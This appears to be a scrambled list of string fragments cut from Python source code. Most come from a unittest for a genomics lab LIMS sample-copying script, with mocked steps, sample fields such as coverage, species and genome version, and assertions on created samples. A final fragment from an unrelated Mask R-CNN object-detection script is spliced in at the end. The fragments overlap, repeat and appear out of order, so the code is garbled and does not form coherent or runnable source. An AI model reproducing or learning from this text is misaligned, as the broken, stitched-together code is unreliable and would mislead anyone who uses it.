"Processing EG 1.0 WF\", \"Remove From Processing EG 1.0 ST\") # test step",
"'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus",
"{ 'nb_input': 2, 'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs':",
"Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged', 'split']),",
"Sample Prep', 'Coverage (X)': 60, 'Required Yield (Gb)': 240, 'Delivery': 'split', 'Analysis Type':",
"PCR-Free DNA Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]),",
"'position': 'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample Prep', 'Coverage (X)': 30,",
"sapiens', 'Genome Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position':",
"'Coverage (X)': 60, 'Required Yield (Gb)': 240, 'Delivery': 'split', 'Analysis Type': 'None', 'User",
"'Species': 'Mus musculus', 'Genome Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1",
"fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1', 'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA Sample Prep',",
"itertools import cycle from unittest.mock import patch, Mock from pyclarity_lims.entities import Sample from",
"'User Prepared Library': 'Yes', 'Rapid Analysis': 'Yes', 'Species': 'Mus musculus', 'Genome Version': 'hg19',",
"ST\") # test step creation inputs_project_step_creation = [] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact,",
"(Gb)': cycle([120, 240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid",
"cycle(['Homo sapiens', 'Mus musculus']), 'Genome Version': cycle(['hg38', 'hg19']), }, 'step_udfs': {'Container Type': '96",
"Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']),",
"'Analysis Type': 'None', 'User Prepared Library': 'Yes', 'Rapid Analysis': 'Yes', 'Species': 'Mus musculus',",
"'Mus musculus', 'Genome Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF',",
"return_value=True) @staticmethod def get_patch_create_container(container): return patch.object(Container, 'create', return_value=container) def setUp(self): self.epp = CopySamples(self.default_argv)",
"{ 'Prep Workflow': cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']),",
"patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container): return patch.object(Container, 'create', return_value=container) def setUp(self):",
"builtins import sorted from itertools import cycle from unittest.mock import patch, Mock from",
"'User Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome Version': cycle(['hg38',",
"'X99999P002A01', 'position': 'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample Prep', 'Coverage (X)':",
"'Required Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk',",
"}, 'step_udfs': {'Container Type': '96 well plate'}, 'output_per_input': 0, 'process_id': '99-9999' } def",
"Type': '96 well plate'}, 'output_per_input': 0, 'process_id': '99-9999' } def test_copy_samples(self): fem =",
"Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1', 'udf':",
"import patch, Mock from pyclarity_lims.entities import Sample from scripts.copy_samples import Container from scripts.copy_samples",
"'Analysis Type': 'Variant Calling gatk', 'Rapid Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version':",
"pws, self.patch_Step_create as psc: self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name':",
"= patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container): return patch.object(Container, 'create', return_value=container) def setUp(self): self.epp",
"self.fem_params = { 'nb_input': 2, 'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01',",
"Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as pws, self.patch_Step_create as",
"'Delivery': 'split', 'Analysis Type': 'None', 'User Prepared Library': 'Yes', 'Rapid Analysis': 'Yes', 'Species':",
"'hg38', }}, { 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1', 'udf': {'Prep",
"60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling",
"self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage as pws, self.patch_Step_create as psc: self.epp._run() expected_create_samples_list = [{ 'container':",
"from unittest.mock import patch, Mock from pyclarity_lims.entities import Sample from scripts.copy_samples import Container",
"patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container): return patch.object(Container, 'create', return_value=container) def setUp(self): self.epp =",
"Type': 'None', 'User Prepared Library': 'Yes', 'Rapid Analysis': 'Yes', 'Species': 'Mus musculus', 'Genome",
"def get_patch_create_container(container): return patch.object(Container, 'create', return_value=container) def setUp(self): self.epp = CopySamples(self.default_argv) self.fem_params =",
"'Coverage (X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged', 'split']), 'Analysis",
"Prep', 'Coverage (X)': 30, 'Required Yield (Gb)': 120, 'Delivery': 'merged', 'User Prepared Library':",
"self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove",
"Processing EG 1.0 ST\") # test step creation inputs_project_step_creation = [] inputs_project_step_creation_dict =",
"Prep', 'Coverage (X)': 60, 'Required Yield (Gb)': 240, 'Delivery': 'split', 'Analysis Type': 'None',",
"patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container): return patch.object(Container, 'create',",
"Prep', 'TruSeq PCR-Free DNA Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield (Gb)':",
"'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library':",
"= fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with",
"fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01', 'position': 'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample Prep',",
"Library': 'No', 'Analysis Type': 'Variant Calling gatk', 'Rapid Analysis': 'No', 'Species': 'Homo sapiens',",
"Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged',",
"self.patch_Step_create as psc: self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002A01',",
"'output_per_input': 0, 'process_id': '99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims",
"self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for input in sorted(inputs_project_step_creation_dict): inputs_project_step_creation.append(inputs_project_step_creation_dict[input]) psc.assert_called_with( self.epp.lims, inputs=inputs_project_step_creation, protocol_step=self.mocked_step,",
"'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From Processing EG",
"from builtins import sorted from itertools import cycle from unittest.mock import patch, Mock",
"'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens',",
"cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User",
"= patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch = patch('lims.copy_samples.create_batch', return_value=True) @staticmethod def get_patch_create_container(container): return patch.object(Container,",
"Nano DNA Sample Prep', 'Coverage (X)': 30, 'Required Yield (Gb)': 120, 'Delivery': 'merged',",
"From Processing EG 1.0 WF\", \"Remove From Processing EG 1.0 ST\") # test",
"'Rapid Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1],",
"Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38', }}, { 'container': fem.object_store_per_type['Container'][1], 'project':",
"{'Prep Workflow': 'TruSeq Nano DNA Sample Prep', 'Coverage (X)': 30, 'Required Yield (Gb)':",
"import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri',",
"From Processing EG 1.0 ST\") # test step creation inputs_project_step_creation = [] inputs_project_step_creation_dict",
"class TestCopySamples(TestEPP): mocked_step = Mock(details=Mock(udf={}), actions=Mock(next_actions=[{}])) patched_get_workflow_stage = patch('scripts.copy_samples.get_workflow_stage', return_value=Mock(uri='a_uri', step=mocked_step)) patched_create_batch =",
"cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome",
"(X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type':",
"Sample from scripts.copy_samples import Container from scripts.copy_samples import CopySamples from tests.test_common import TestEPP,",
"from pyclarity_lims.entities import Sample from scripts.copy_samples import Container from scripts.copy_samples import CopySamples from",
"60, 'Required Yield (Gb)': 240, 'Delivery': 'split', 'Analysis Type': 'None', 'User Prepared Library':",
"'nb_input': 2, 'project_name': 'X99999', 'process_id': '99-9999', 'input_container_name': 'X99999P001', 'sample_name': cycle(['X99999P001A01', 'X99999P001B01']), 'sample_udfs': {",
"musculus', 'Genome Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create",
"= Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\ self.patched_get_workflow_stage",
"Type': 'Variant Calling gatk', 'Rapid Analysis': 'No', 'Species': 'Homo sapiens', 'Genome Version': 'hg38',",
"30, 'Required Yield (Gb)': 120, 'Delivery': 'merged', 'User Prepared Library': 'No', 'Analysis Type':",
"scripts.copy_samples import Container from scripts.copy_samples import CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker class",
"'A:1', 'udf': {'Prep Workflow': 'TruSeq Nano DNA Sample Prep', 'Coverage (X)': 30, 'Required",
"240]), 'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No',",
"Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No',",
"0, 'process_id': '99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process",
"Version': 'hg19', }}, ] self.epp.lims.create_batch.assert_called_once_with(Sample, expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG",
"expected_create_samples_list) pws.assert_any_call(self.epp.lims, 'PreSeqLab EG2.1 WF', 'Create Manifest EG 1.0 ST') pws.assert_any_call(self.epp.lims, \"Remove From",
"'Delivery': cycle(['merged', 'split']), 'Analysis Type': cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']),",
"'udf': {'Prep Workflow': 'TruSeq PCR-Free DNA Sample Prep', 'Coverage (X)': 60, 'Required Yield",
"fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params) self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage",
"'Prep Workflow': cycle(['TruSeq Nano DNA Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']), 'Coverage",
"self.epp.lims.get_containers = Mock(return_value=[]) self.workflow_stage = Mock(uri='a_uri') self.patch_Step_create = patch('scripts.copy_samples.Step.create', return_value=self.mocked_step) with self.get_patch_create_container(fem.create_a_fake_container(container_name='X99999P002')), \\",
"'99-9999' } def test_copy_samples(self): fem = FakeEntitiesMaker() self.epp.lims = fem.lims self.epp.process = fem.create_a_fake_process(**self.fem_params)",
"sorted from itertools import cycle from unittest.mock import patch, Mock from pyclarity_lims.entities import",
"'hg19']), }, 'step_udfs': {'Container Type': '96 well plate'}, 'output_per_input': 0, 'process_id': '99-9999' }",
"cycle(['Variant Calling gatk', 'None']), 'Rapid Analysis': cycle(['No', 'Yes']), 'User Prepared Library': cycle(['No', 'Yes']),",
"DNA Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield (Gb)': cycle([120, 240]), 'Delivery':",
"cycle(['No', 'Yes']), 'Species': cycle(['Homo sapiens', 'Mus musculus']), 'Genome Version': cycle(['hg38', 'hg19']), }, 'step_udfs':",
"from scripts.copy_samples import CopySamples from tests.test_common import TestEPP, FakeEntitiesMaker class TestCopySamples(TestEPP): mocked_step =",
"'container': fem.object_store_per_type['Container'][1], 'project': fem.object_store_per_type['Project'][0], 'name': 'X99999P002B01', 'position': 'B:1', 'udf': {'Prep Workflow': 'TruSeq PCR-Free",
"DNA Sample Prep', 'Coverage (X)': 60, 'Required Yield (Gb)': 240, 'Delivery': 'split', 'Analysis",
"step creation inputs_project_step_creation = [] inputs_project_step_creation_dict = { self.epp.artifacts[0].samples[0].artifact.name: self.epp.artifacts[0].samples[0].artifact, self.epp.artifacts[1].samples[0].artifact.name: self.epp.artifacts[1].samples[0].artifact} for",
"self.patched_get_workflow_stage as pws, self.patch_Step_create as psc: self.epp._run() expected_create_samples_list = [{ 'container': fem.object_store_per_type['Container'][1], 'project':",
"Sample Prep', 'TruSeq PCR-Free DNA Sample Prep']), 'Coverage (X)': cycle([30, 60]), 'Required Yield"
] |
[
"import ceil from model_vc import Generator device = 'cpu' G = Generator(32,256,512,32).eval().to(device) g_checkpoint",
"coding: utf-8 # In[ ]: #from resemblyzer import preprocess_wav, VoiceEncoder #Style encoder import",
"1 with torch.no_grad(): _, x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg =",
"os import pickle import torch import numpy as np import data_loader.dataLoader as datas",
"import preprocess_wav, VoiceEncoder #Style encoder import os import pickle import torch import numpy",
"_ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg = x_identic_psnt[0, 0, :, :].cpu().numpy() spect_vc.append(",
":, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]), uttr_trg) ) with open('results.pkl', 'wb') as handle: pickle.dump(spect_vc,",
"device = 'cpu' G = Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt', map_location = torch.device('cpu')) #AutoVC",
"emb_trg = sbmt_j[\"style\"][np.newaxis, :] tmp = np.zeros((256), dtype='float64') tmp[0] = 1 with torch.no_grad():",
"#from resemblyzer import preprocess_wav, VoiceEncoder #Style encoder import os import pickle import torch",
"model weights G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset() metadata = [data[0]] spect_vc = [] for",
"encoder import os import pickle import torch import numpy as np import data_loader.dataLoader",
"sbmt_j in metadata: emb_trg = sbmt_j[\"style\"][np.newaxis, :] tmp = np.zeros((256), dtype='float64') tmp[0] =",
"= [data[0]] spect_vc = [] for sbmt_i in metadata: x_org = sbmt_i['spectrogram'] uttr_org",
"tmp[0] = 1 with torch.no_grad(): _, x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg)",
"with torch.no_grad(): _, x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg = x_identic_psnt[0,",
"G = Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt', map_location = torch.device('cpu')) #AutoVC model weights G.load_state_dict(g_checkpoint['model'])",
"In[ ]: #from resemblyzer import preprocess_wav, VoiceEncoder #Style encoder import os import pickle",
"[] for sbmt_i in metadata: x_org = sbmt_i['spectrogram'] uttr_org = x_org emb_org =",
"]: #from resemblyzer import preprocess_wav, VoiceEncoder #Style encoder import os import pickle import",
"emb_trg) uttr_trg = x_identic_psnt[0, 0, :, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]), uttr_trg) ) with",
"sbmt_i['spectrogram'] uttr_org = x_org emb_org = sbmt_i['style'][np.newaxis, :] for sbmt_j in metadata: emb_trg",
"preprocess_wav, VoiceEncoder #Style encoder import os import pickle import torch import numpy as",
"#Style encoder import os import pickle import torch import numpy as np import",
"utf-8 # In[ ]: #from resemblyzer import preprocess_wav, VoiceEncoder #Style encoder import os",
"as np import data_loader.dataLoader as datas from math import ceil from model_vc import",
"spect_vc = [] for sbmt_i in metadata: x_org = sbmt_i['spectrogram'] uttr_org = x_org",
"= sbmt_j[\"style\"][np.newaxis, :] tmp = np.zeros((256), dtype='float64') tmp[0] = 1 with torch.no_grad(): _,",
"metadata = [data[0]] spect_vc = [] for sbmt_i in metadata: x_org = sbmt_i['spectrogram']",
"map_location = torch.device('cpu')) #AutoVC model weights G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset() metadata = [data[0]]",
"#!/usr/bin/env python # coding: utf-8 # In[ ]: #from resemblyzer import preprocess_wav, VoiceEncoder",
"= [] for sbmt_i in metadata: x_org = sbmt_i['spectrogram'] uttr_org = x_org emb_org",
"import pickle import torch import numpy as np import data_loader.dataLoader as datas from",
"sbmt_i['style'][np.newaxis, :] for sbmt_j in metadata: emb_trg = sbmt_j[\"style\"][np.newaxis, :] tmp = np.zeros((256),",
"G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg = x_identic_psnt[0, 0, :, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]),",
"#AutoVC model weights G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset() metadata = [data[0]] spect_vc = []",
"uttr_trg = x_identic_psnt[0, 0, :, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]), uttr_trg) ) with open('results.pkl',",
"x_identic_psnt[0, 0, :, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]), uttr_trg) ) with open('results.pkl', 'wb') as",
"data = datas.voiceDataset() metadata = [data[0]] spect_vc = [] for sbmt_i in metadata:",
":] for sbmt_j in metadata: emb_trg = sbmt_j[\"style\"][np.newaxis, :] tmp = np.zeros((256), dtype='float64')",
"<reponame>casperwang/autovc #!/usr/bin/env python # coding: utf-8 # In[ ]: #from resemblyzer import preprocess_wav,",
"emb_org = sbmt_i['style'][np.newaxis, :] for sbmt_j in metadata: emb_trg = sbmt_j[\"style\"][np.newaxis, :] tmp",
"np.zeros((256), dtype='float64') tmp[0] = 1 with torch.no_grad(): _, x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis,",
"= G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg = x_identic_psnt[0, 0, :, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"],",
"for sbmt_j in metadata: emb_trg = sbmt_j[\"style\"][np.newaxis, :] tmp = np.zeros((256), dtype='float64') tmp[0]",
"sbmt_j[\"style\"][np.newaxis, :] tmp = np.zeros((256), dtype='float64') tmp[0] = 1 with torch.no_grad(): _, x_identic_psnt,",
"torch.no_grad(): _, x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg = x_identic_psnt[0, 0,",
"= Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt', map_location = torch.device('cpu')) #AutoVC model weights G.load_state_dict(g_checkpoint['model']) data",
"import torch import numpy as np import data_loader.dataLoader as datas from math import",
"# In[ ]: #from resemblyzer import preprocess_wav, VoiceEncoder #Style encoder import os import",
"import numpy as np import data_loader.dataLoader as datas from math import ceil from",
"import Generator device = 'cpu' G = Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt', map_location =",
"in metadata: x_org = sbmt_i['spectrogram'] uttr_org = x_org emb_org = sbmt_i['style'][np.newaxis, :] for",
"VoiceEncoder #Style encoder import os import pickle import torch import numpy as np",
"x_org emb_org = sbmt_i['style'][np.newaxis, :] for sbmt_j in metadata: emb_trg = sbmt_j[\"style\"][np.newaxis, :]",
"dtype='float64') tmp[0] = 1 with torch.no_grad(): _, x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :],",
"'cpu' G = Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt', map_location = torch.device('cpu')) #AutoVC model weights",
"= np.zeros((256), dtype='float64') tmp[0] = 1 with torch.no_grad(): _, x_identic_psnt, _ = G(uttr_org,",
"= 1 with torch.no_grad(): _, x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg",
"pickle import torch import numpy as np import data_loader.dataLoader as datas from math",
"import os import pickle import torch import numpy as np import data_loader.dataLoader as",
"= sbmt_i['style'][np.newaxis, :] for sbmt_j in metadata: emb_trg = sbmt_j[\"style\"][np.newaxis, :] tmp =",
"tmp = np.zeros((256), dtype='float64') tmp[0] = 1 with torch.no_grad(): _, x_identic_psnt, _ =",
"= torch.device('cpu')) #AutoVC model weights G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset() metadata = [data[0]] spect_vc",
":].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]), uttr_trg) ) with open('results.pkl', 'wb') as handle: pickle.dump(spect_vc, handle)",
"# coding: utf-8 # In[ ]: #from resemblyzer import preprocess_wav, VoiceEncoder #Style encoder",
"= datas.voiceDataset() metadata = [data[0]] spect_vc = [] for sbmt_i in metadata: x_org",
"= torch.load('train_weights.ckpt', map_location = torch.device('cpu')) #AutoVC model weights G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset() metadata",
"Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt', map_location = torch.device('cpu')) #AutoVC model weights G.load_state_dict(g_checkpoint['model']) data =",
"x_org = sbmt_i['spectrogram'] uttr_org = x_org emb_org = sbmt_i['style'][np.newaxis, :] for sbmt_j in",
"torch.load('train_weights.ckpt', map_location = torch.device('cpu')) #AutoVC model weights G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset() metadata =",
"python # coding: utf-8 # In[ ]: #from resemblyzer import preprocess_wav, VoiceEncoder #Style",
"[data[0]] spect_vc = [] for sbmt_i in metadata: x_org = sbmt_i['spectrogram'] uttr_org =",
"torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg = x_identic_psnt[0, 0, :, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]), uttr_trg)",
"G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset() metadata = [data[0]] spect_vc = [] for sbmt_i in",
"sbmt_i in metadata: x_org = sbmt_i['spectrogram'] uttr_org = x_org emb_org = sbmt_i['style'][np.newaxis, :]",
"g_checkpoint = torch.load('train_weights.ckpt', map_location = torch.device('cpu')) #AutoVC model weights G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset()",
"as datas from math import ceil from model_vc import Generator device = 'cpu'",
"from math import ceil from model_vc import Generator device = 'cpu' G =",
"from model_vc import Generator device = 'cpu' G = Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt',",
"weights G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset() metadata = [data[0]] spect_vc = [] for sbmt_i",
"= x_identic_psnt[0, 0, :, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]), uttr_trg) ) with open('results.pkl', 'wb')",
"= 'cpu' G = Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt', map_location = torch.device('cpu')) #AutoVC model",
"torch import numpy as np import data_loader.dataLoader as datas from math import ceil",
"datas.voiceDataset() metadata = [data[0]] spect_vc = [] for sbmt_i in metadata: x_org =",
"import data_loader.dataLoader as datas from math import ceil from model_vc import Generator device",
"for sbmt_i in metadata: x_org = sbmt_i['spectrogram'] uttr_org = x_org emb_org = sbmt_i['style'][np.newaxis,",
"_, x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg = x_identic_psnt[0, 0, :,",
"in metadata: emb_trg = sbmt_j[\"style\"][np.newaxis, :] tmp = np.zeros((256), dtype='float64') tmp[0] = 1",
":] tmp = np.zeros((256), dtype='float64') tmp[0] = 1 with torch.no_grad(): _, x_identic_psnt, _",
"uttr_org = x_org emb_org = sbmt_i['style'][np.newaxis, :] for sbmt_j in metadata: emb_trg =",
":], emb_trg) uttr_trg = x_identic_psnt[0, 0, :, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]), uttr_trg) )",
"model_vc import Generator device = 'cpu' G = Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt', map_location",
"x_identic_psnt, _ = G(uttr_org, torch.from_numpy(tmp).cpu().float()[np.newaxis, :], emb_trg) uttr_trg = x_identic_psnt[0, 0, :, :].cpu().numpy()",
"= x_org emb_org = sbmt_i['style'][np.newaxis, :] for sbmt_j in metadata: emb_trg = sbmt_j[\"style\"][np.newaxis,",
"0, :, :].cpu().numpy() spect_vc.append( ('{}x{}'.format(sbmt_i[\"person\"], sbmt_j[\"person\"]), uttr_trg) ) with open('results.pkl', 'wb') as handle:",
"datas from math import ceil from model_vc import Generator device = 'cpu' G",
"math import ceil from model_vc import Generator device = 'cpu' G = Generator(32,256,512,32).eval().to(device)",
"metadata: emb_trg = sbmt_j[\"style\"][np.newaxis, :] tmp = np.zeros((256), dtype='float64') tmp[0] = 1 with",
"= sbmt_i['spectrogram'] uttr_org = x_org emb_org = sbmt_i['style'][np.newaxis, :] for sbmt_j in metadata:",
"metadata: x_org = sbmt_i['spectrogram'] uttr_org = x_org emb_org = sbmt_i['style'][np.newaxis, :] for sbmt_j",
"data_loader.dataLoader as datas from math import ceil from model_vc import Generator device =",
"numpy as np import data_loader.dataLoader as datas from math import ceil from model_vc",
"ceil from model_vc import Generator device = 'cpu' G = Generator(32,256,512,32).eval().to(device) g_checkpoint =",
"resemblyzer import preprocess_wav, VoiceEncoder #Style encoder import os import pickle import torch import",
"np import data_loader.dataLoader as datas from math import ceil from model_vc import Generator",
"Generator device = 'cpu' G = Generator(32,256,512,32).eval().to(device) g_checkpoint = torch.load('train_weights.ckpt', map_location = torch.device('cpu'))",
"torch.device('cpu')) #AutoVC model weights G.load_state_dict(g_checkpoint['model']) data = datas.voiceDataset() metadata = [data[0]] spect_vc ="
] |
[
"import math import re import time import numpy as np import tensorflow as",
"you're training a model on the same # machine, in which case use",
"IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display() # Device",
"Object detector (by sequential file read from directory) # import os import sys",
"skimage import shutil # Root directory of the project ROOT_DIR = os.path.abspath(\"../../\") #",
") classes = [dataset.class_info[i][\"name\"] for i in r['class_ids']] if \"prescription\" in classes: print(\"found",
"print(\"Loading weights \", weights_path) model.load_weights(weights_path, by_name=True) return model, config def detector(model,config, dataset, DATA_DIR):",
"help='Directory of the target dataset to detect') args = parser.parse_args() assert args.dataset ,\\",
"for 'training' test mode not ready yet TEST_MODE = \"inference\" # set model",
"tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or, load the last model you",
